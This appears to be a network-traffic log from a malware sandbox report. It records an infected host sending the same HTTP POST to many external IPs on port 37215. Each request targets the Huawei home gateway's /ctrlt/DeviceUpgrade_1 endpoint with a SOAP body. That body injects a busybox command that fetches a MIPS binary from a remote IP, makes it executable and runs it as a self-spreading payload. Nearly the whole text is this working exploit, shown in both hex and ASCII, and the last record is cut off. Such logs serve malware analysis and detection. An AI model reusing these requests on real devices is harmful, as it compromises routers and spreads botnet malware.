                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2356192.168.2.1355670197.113.40.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785706043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2357192.168.2.1345932197.116.11.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785723925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2358192.168.2.13408461.84.73.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785883904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2359192.168.2.133897041.225.1.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785906076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2360192.168.2.1348606157.11.161.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785923958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2361192.168.2.1334690157.154.247.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785943985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2362192.168.2.1336440121.30.16.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785959959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2363192.168.2.133617641.225.207.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786113977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2364192.168.2.1354208212.89.84.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786132097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2365192.168.2.1345134135.13.218.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.786139011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 